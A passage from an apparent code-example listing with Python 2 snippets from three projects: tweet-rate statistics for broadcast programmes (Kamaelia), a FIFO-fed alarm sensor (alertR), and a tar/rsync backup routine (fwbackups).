                    cursor.execute("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                else:
                    print "Analysis component: Skipping tweet - falls outside the programme's running time"

                # Mark the tweet as analysed
                cursor.execute("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                print "Analysis component: Done!"

            # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
            cursor.execute("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
            data = cursor.fetchall()
            # Cycle through each programme that's ready for final analysis
            for result in data:
                pid = result[0]
                cursor.execute("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                data2 = cursor.fetchone()
                duration = data2[0]
                totaltweets = result[1]
                meantweets = result[2]
                mediantweets = result[3]
                modetweets = result[4]
                stdevtweets = result[5]
                title = data2[1]
                timestamp = result[6]
                timediff = result[7]
                # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                cursor.execute("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                if cursor.fetchone() == None:
                    # OK to finalise stats here
                    print "Analysis component: Finalising stats for pid:", pid, "(" + title + ")"

                    meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                    analyseddata = cursor.fetchall()

                    runningtime = duration / 60

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val
                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    if 1: # This data is purely a readout to the terminal at the moment associated with word and phrase frequency, and retweets
                        sqltimestamp1 = timestamp - timediff
                        sqltimestamp2 = timestamp + duration - timediff
                        cursor.execute("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                        rawtweetids = cursor.fetchall()
                        tweetids = list()
                        for tweet in rawtweetids:
                            tweetids.append(tweet[0])

                        if len(tweetids) > 0:
                            # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                            #failcounter = 0
                            self.send([pid,tweetids],"nltkfinal")
                            while not self.dataReady("nltkfinal"):
                            #    if failcounter >= 3000:
                            #        nltkdata = list()
                            #        break
                                time.sleep(0.01)
                            #    failcounter += 1
                            #if failcounter < 3000:
                            if 1:
                                nltkdata = self.recv("nltkfinal")

                    cursor.execute("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                    print "Analysis component: Done!"

            # Sleep here until more data is available to analyse
            print "Analysis component: Sleeping for 10 seconds..."
            time.sleep(10)

Example 16

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc
            self.dbConnect()
            while not self.finished():
                # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

                Print("Analysis component: Checking for new data...")

                # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analsed' to speed up for now)
                # Could move this into the main app to take a copy of tweets on arrival, but would rather solve separately if poss
                self.db_select("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
                data = self.db_fetchall()

                # Cycle through all the as yet unanalysed tweets
                for result in data:
                    tid = result[0]
                    pid = result[1]
                    tweettime = result[2] # Timestamp based on the tweet's created_at field
                    tweettext = result[3]
                    tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                    progpos = result[5] # Position through the programme that the tweet was made
                    dbtime = datetime.utcfromtimestamp(tweettime)
                    # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                    # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                    dbtime = dbtime.replace(second=0)
                    Print("Analysis component: Analysing new tweet for pid", pid, "(" , dbtime ,"):")
                    try:
                        Print("Analysis component: '" , tweettext , "'")
                    except UnicodeEncodeError, e:
                        Print ("UnicodeEncodeError", e)
                    self.db_select("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                    progdata = self.db_fetchone()
                    duration = progdata[0]
                    self.db_select("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                    progdata2 = self.db_fetchone()
                    totaltweets = progdata2[0]
                    # Increment the total tweets recorded for this programme's broadcast
                    totaltweets += 1
                    meantweets = progdata2[1]
                    mediantweets = progdata2[2]
                    modetweets = progdata2[3]
                    stdevtweets = progdata2[4]
                    timediff = progdata2[5]
                    timestamp = progdata2[6]
                    utcoffset = progdata2[7]

                    # Need to work out the timestamp to assign to the entry in analysed data
                    progstart = timestamp - timediff
                    progmins = int(progpos / 60)
                    analysedstamp = int(progstart + (progmins * 60))
                    # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless

                    if progpos > 0 and progpos <= duration:
                        self.db_select("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                        analyseddata = self.db_fetchone()
                        # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                        #failcounter = 0
                        # Pass this tweet to the NLTK analysis component
                        self.send([pid,tweetid],"nltk")
#                        print "BUM", 1
                        while not self.dataReady("nltk"):
                        #    if failcounter >= 3000:
                        #        nltkdata = list()
                        #        break
                            time.sleep(0.01)
                        #    failcounter += 1
                        #if failcounter < 3000:
#                        print "BUM", 2
                        if 1:
                            # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                            nltkdata = self.recv("nltk")
                        if analyseddata == None: # No tweets yet recorded for this minute
                            minutetweets = 1
                            self.db_insert("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                            for word in nltkdata:
                                # Check if we're storing a word or phrase here
                                if nltkdata[word][0] == 1:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                        else:
                            did = analyseddata[0]
                            minutetweets = analyseddata[1] # Get current number of tweets for this minute
                            minutetweets += 1 # Add one to it for this tweet

                            self.db_update("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                            for word in nltkdata:
                                # Check if we're storing a word or phrase
                                if nltkdata[word][0] == 1:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this phrase has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                                else:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this word has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                        # Averages / stdev are calculated roughly based on the programme's running time at this point
                        progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                        actualstart = progdate - timedelta(seconds=timediff)
                        actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                        # Calculate how far through the programme this tweet occurred
                        runningtime = actualtweettime - actualstart
                        runningtime = runningtime.seconds

                        if runningtime < 0:
                            runningtime = 0
                        else:
                            runningtime = float(runningtime) / 60

                        try:
                            meantweets = totaltweets / runningtime
                        except ZeroDivisionError, e:
                            meantweets = 0

                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                        analyseddata = self.db_fetchall()

                        runningtime = int(runningtime)

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            # Create a list of each minute and the total tweets for that minute in the programme
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries
                        # If a minute has no tweets, it won't have a database record, so this has to be added
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        # Order by programme position 0,1,2, mins etc
                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val

                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError, e:
                            stdevtweets = 0

                        # Finished analysis - update DB
                        self.db_update("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                    else:
                        pass
                        # Print("Analysis component: Skipping tweet - falls outside the programme's running time")

                    # Mark the tweet as analysed
                    self.db_update("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                    Print("Analysis component: Done!")

                # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
                self.db_select("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
                data = self.db_fetchall()
                # Cycle through each programme that's ready for final analysis
                for result in data:
                    pid = result[0]
                    self.db_select("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                    data2 = self.db_fetchone()
                    if not data2:
                        Print("Getting data for duration,title, etc failed - pid", pid)
                        Print("Let's try skipping this pid")
                        continue
                    duration = data2[0]
                    totaltweets = result[1]
                    meantweets = result[2]
                    mediantweets = result[3]
                    modetweets = result[4]
                    stdevtweets = result[5]
                    title = data2[1]
                    timestamp = result[6]
                    timediff = result[7]
                    # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                    self.db_select("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                    if self.db_fetchone() == None:
                        # OK to finalise stats here
                        Print("Analysis component: Finalising stats for pid:", pid, "(" , title , ")")
                        meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute
                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                        analyseddata = self.db_fetchall()

                        runningtime = duration / 60

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val
                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError, e:
                            stdevtweets = 0

                        if 1: # This data is purely a readout to the terminal at the moment associated with word and phrase frequency, and retweets
                            sqltimestamp1 = timestamp - timediff
                            sqltimestamp2 = timestamp + duration - timediff
                            self.db_select("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                            rawtweetids = self.db_fetchall()
                            tweetids = list()
                            for tweet in rawtweetids:
                                tweetids.append(tweet[0])

                            if len(tweetids) > 0:
                                # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 10 secs)
                                failcounter = 0
                                self.send([pid,tweetids],"nltkfinal")
                                while not self.dataReady("nltkfinal"):
                                    if failcounter >= 1000:
                                        Print("Timed out waiting for NTLKFINAL")
                                        nltkdata = list()
                                        break
                                    time.sleep(0.01)

                                    failcounter += 1
                                    if failcounter %100 == 0:
                                        Print( "Hanging waiting for NLTKFINAL" )

                                Print("failcounter (<1000 is success)", failcounter)
                                if failcounter < 1000:
#                                if 1:
                                    nltkdata = self.recv("nltkfinal")

                        self.db_update("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                        Print("Analysis component: Done!")

                # Sleep here until more data is available to analyse
                Print("Analysis component: Sleeping for 10 seconds...")
                time.sleep(10)

Example 17

Project: alertR
Source File: sensor.py
View license
	def run(self):

		while True:

			# check if FIFO file exists
			# => remove it if it does
			if os.path.exists(self.fifoFile):
				try:
					os.remove(self.fifoFile)
				except Exception as e:
					logging.exception("[%s]: Could not delete "
						% self.fileName
						+ "FIFO file of sensor with id '%d'."
						% self.id)
					time.sleep(10)
					continue

			# create a new FIFO file
			try:
				os.umask(self.umask)
				os.mkfifo(self.fifoFile)
			except Exception as e:
				logging.exception("[%s]: Could not create "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			# read FIFO for data
			data = ""
			try:
				fifo = open(self.fifoFile, "r")
				data = fifo.read()
				fifo.close()
			except Exception as e:
				logging.exception("[%s]: Could not read data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			logging.debug("[%s]: Received data '%s' from "
				% (self.fileName, data)
				+ "FIFO file of sensor with id '%d'."
				% self.id)

			# parse received data
			try:

				message = json.loads(data)

				# Parse message depending on type.
				# Type: statechange
				if str(message["message"]).upper() == "STATECHANGE":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Set new data.
					if self.sensorDataType == SensorDataType.NONE:
						self.sensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						self.sensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						self.sensorData = float(message["payload"]["data"])

					# Set state.
					self.temporaryState = tempInputState

					# Force state change sending if the data could be changed.
					if self.sensorDataType != SensorDataType.NONE:

						# Create state change object that is
						# send to the server.
						self.forceSendStateLock.acquire()
						self.stateChange = StateChange()
						self.stateChange.clientSensorId = self.id
						if tempInputState == self.triggerState:
							self.stateChange.state = 1
						else:
							self.stateChange.state = 0
						self.stateChange.dataType = tempDataType
						self.stateChange.sensorData = self.sensorData
						self.shouldForceSendState = True
						self.forceSendStateLock.release()

				# Type: sensoralert
				elif str(message["message"]).upper() == "SENSORALERT":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if hasOptionalData field is valid.
					tempHasOptionalData = message[
						"payload"]["hasOptionalData"]
					if not self._checkHasOptionalData(tempHasOptionalData):
						logging.error("[%s]: Received hasOptionalData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					if self.sensorDataType == SensorDataType.NONE:
						tempSensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						tempSensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						tempSensorData = float(message["payload"]["data"])

					# Check if hasLatestData field is valid.
					tempHasLatestData = message[
						"payload"]["hasLatestData"]
					if not self._checkHasLatestData(tempHasLatestData):
						logging.error("[%s]: Received hasLatestData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if changeState field is valid.
					tempChangeState = message[
						"payload"]["changeState"]
					if not self._checkChangeState(tempChangeState):
						logging.error("[%s]: Received changeState field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data should be transfered with the sensor alert
					# => if it should parse it
					tempOptionalData = None
					if tempHasOptionalData:

						tempOptionalData = message["payload"]["optionalData"]

						# check if data is of type dict
						if not isinstance(tempOptionalData, dict):
							logging.warning("[%s]: Received optional data "
								% self.fileName
								+ "from FIFO file of sensor with id '%d' "
								% self.id
								+ "invalid. Ignoring message.")
							continue

					# Set optional data.
					self.hasOptionalData = tempHasOptionalData
					self.optionalData = tempOptionalData

					# Set new data.
					if tempHasLatestData:
						self.sensorData = tempSensorData

					# Set state.
					if tempChangeState:
						self.temporaryState = tempInputState

					# Create sensor alert object that is send to the server.
					self.forceSendAlertLock.acquire()
					self.sensorAlert = SensorAlert()
					self.sensorAlert.clientSensorId = self.id
					if tempInputState == self.triggerState:
						self.sensorAlert.state = 1
					else:
						self.sensorAlert.state = 0
					self.sensorAlert.hasOptionalData = tempHasOptionalData
					self.sensorAlert.optionalData = tempOptionalData
					self.sensorAlert.changeState = tempChangeState
					self.sensorAlert.hasLatestData = tempHasLatestData
					self.sensorAlert.dataType = tempDataType
					self.sensorAlert.sensorData = tempSensorData
					self.shouldForceSendAlert = True
					self.forceSendAlertLock.release()

				# Type: invalid
				else:
					raise ValueError("Received invalid message type.")

			except Exception as e:
				logging.exception("[%s]: Could not parse received data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				continue

Example 18

Project: fwbackups
Source File: backup.py
View license
  def backupPaths(self, paths, command):
    """Does the actual copying dirty work"""
    # this is in common
    self._current = 0
    if len(paths) == 0:
      return True
    self._total = len(paths)
    self._status = STATUS_BACKING_UP
    wasAnError = False
    if self.options['Engine'] == 'tar':
      if MSWINDOWS:
        self.logger.logmsg('INFO', _('Using %s on Windows: Cancel function will only take effect after a path has been completed.' % self.options['Engine']))
        import tarfile
        fh = tarfile.open(self.dest, 'w')
        for i in paths:
          self.ifCancel()
          self._current += 1
          self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
          fh.add(i, recursive=self.options['Recursive'])
        fh.close()
      else: # not MSWINDOWS
        for i in paths:
          i = fwbackups.escapeQuotes(i, 1)
          self.ifCancel()
          self._current += 1
          self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s '%(c)s'" % {'a': self.options['Nice'], 'b': command, 'c': i}))
          sub = fwbackups.executeSub("nice -n %i %s '%s'" % (self.options['Nice'], command, i), env=self.environment, shell=True)
          self.pids.append(sub.pid)
          self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
          # track stdout
          errors = []
          # use nonblocking I/O
          fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
          fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
          while sub.poll() in ["", None]:
            time.sleep(0.01)
            try:
              errors += sub.stderr.readline()
            except IOError, description:
              pass
          self.pids.remove(sub.pid)
          retval = sub.poll()
          self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
          # Something wrong?
          if retval != EXIT_STATUS_OK and retval != 2:
            wasAnError = True
            self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
            self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    elif self.options['Engine'] == 'tar.gz':
      self._total = 1
      if MSWINDOWS:
        self.logger.logmsg('INFO', _('Using %s on Windows: Cancel function will only take effect after a path has been completed.' % self.options['Engine']))
        import tarfile
        fh = tarfile.open(self.dest, 'w:gz')
        for i in paths:
          self._current += 1
          self.ifCancel()
          self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
          fh.add(i, recursive=self.options['Recursive'])
          self.logger.logmsg('DEBUG', _('Adding path `%s\' to the archive' % i))
        fh.close()
      else: # not MSWINDOWS
        self._current = 1
        escapedPaths = [fwbackups.escapeQuotes(i, 1) for i in paths]
        # This is a fancy way for getting i = "'one' 'two' 'three'"
        i = "'%s'" % "' '".join(escapedPaths)
        self.logger.logmsg('INFO', _('Using %s: Must backup all paths at once - Progress notification will be disabled.' % self.options['Engine']))
        self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s') % {'a': self._current, 'b': self._total, 'c': i.replace("'", '')})
        self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s %(c)s" % {'a': self.options['Nice'], 'b': command, 'c': i}))
        # Don't wrap i in quotes; we did this above already when mering the paths
        sub = fwbackups.executeSub("nice -n %i %s %s" % (self.options['Nice'], command, i), env=self.environment, shell=True)
        self.pids.append(sub.pid)
        self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
        # track stdout
        errors = []
        # use nonblocking I/O
        fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
        fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        while sub.poll() in ["", None]:
          time.sleep(0.01)
          try:
            errors += sub.stderr.readline()
          except IOError, description:
            pass
        self.pids.remove(sub.pid)
        retval = sub.poll()
        self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
        # Something wrong?
        if retval != EXIT_STATUS_OK and retval != 2:
          wasAnError = True
          self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
          self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    elif self.options['Engine'] == 'tar.bz2':
      self._total = 1
      if MSWINDOWS:
        self.logger.logmsg('INFO', _('Using %s on Windows: Cancel function will only take effect after a path has been completed.' % self.options['Engine']))
        import tarfile
        fh = tarfile.open(self.dest, 'w:bz2')
        for i in paths:
          self._current += 1
          self.ifCancel()
          self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
          fh.add(i, recursive=self.options['Recursive'])
          self.logger.logmsg('DEBUG', _('Adding path `%s\' to the archive' % i))
        fh.close()
      else: # not MSWINDOWS
        self._current = 1
        escapedPaths = [fwbackups.escapeQuotes(i, 1) for i in paths]
        # This is a fancy way for getting i = "'one' 'two' 'three'"
        i = "'%s'" % "' '".join(escapedPaths)
        self.logger.logmsg('INFO', _('Using %s: Must backup all paths at once - Progress notification will be disabled.' % self.options['Engine']))
        self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s') % {'a': self._current, 'b': self._total, 'c': i})
        self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s %(c)s" % {'a': self.options['Nice'], 'b': command, 'c': i}))
        # Don't wrap i in quotes; we did this above already when mering the paths
        sub = fwbackups.executeSub("nice -n %i %s %s" % (self.options['Nice'], command, i), env=self.environment, shell=True)
        self.pids.append(sub.pid)
        self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
        # track stdout
        errors = []
        # use nonblocking I/O
        fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
        fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        while sub.poll() in ["", None]:
          time.sleep(0.01)
          try:
            errors += sub.stderr.readline()
          except IOError, description:
            pass
        self.pids.remove(sub.pid)
        retval = sub.poll()
        self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
        # Something wrong?
        if retval != EXIT_STATUS_OK and retval != 2:
          wasAnError = True
          self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
          self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    elif self.options['Engine'] == 'rsync':
      # in this case, self.{folderdest,dest} both need to be created
      if self.options['DestinationType'] == 'remote (ssh)':
        client, sftpClient = sftp.connect(self.options['RemoteHost'], self.options['RemoteUsername'], self.options['RemotePassword'], self.options['RemotePort'])
        if not wasAnError:
          for i in paths:
            if self.toCancel:
              # Check if we need to cancel in between paths
              # If so, break and close the SFTP session
              # Immediately after, self.ifCancel() is run.
              break
            self._current += 1
            self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s') % {'a': self._current, 'b': self._total, 'c': i})
            if not os.path.exists(encode(i)):
              self.logger.logmsg('WARNING', _("Path %s is missing or cannot be read and will be excluded from the backup.") % i)
            sftp.put(sftpClient, encode(i), encode(os.path.normpath(self.options['RemoteFolder']+os.sep+os.path.basename(self.dest)+os.sep+os.path.dirname(i))), symlinks=not self.options['FollowLinks'], excludes=encode(self.options['Excludes'].split('\n')))
        sftpClient.close()
        client.close()
      else: # destination is local
        for i in paths:
          self.ifCancel()
          self._current += 1
          if MSWINDOWS:
            # let's deal with real paths
            self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
            shutil_modded.copytree_fullpaths(encode(i), encode(self.dest))
          else: # not MSWINDOWS; UNIX/OS X can call rsync binary
            i = fwbackups.escapeQuotes(i, 1)
            self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s %(c)s '%(d)s'" % {'a': self.options['Nice'], 'b': command, 'c': i, 'd': fwbackups.escapeQuotes(self.dest, 1)}))
            sub = fwbackups.executeSub("nice -n %i %s '%s' '%s'" % (self.options['Nice'], command, i, fwbackups.escapeQuotes(self.dest, 1)), env=self.environment, shell=True)
            self.pids.append(sub.pid)
            self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
            # track stdout
            errors = []
            # use nonblocking I/O
            fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
            fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
            while sub.poll() in ["", None]:
              time.sleep(0.01)
              try:
                errors += sub.stderr.readline()
              except IOError, description:
                pass
            self.pids.remove(sub.pid)
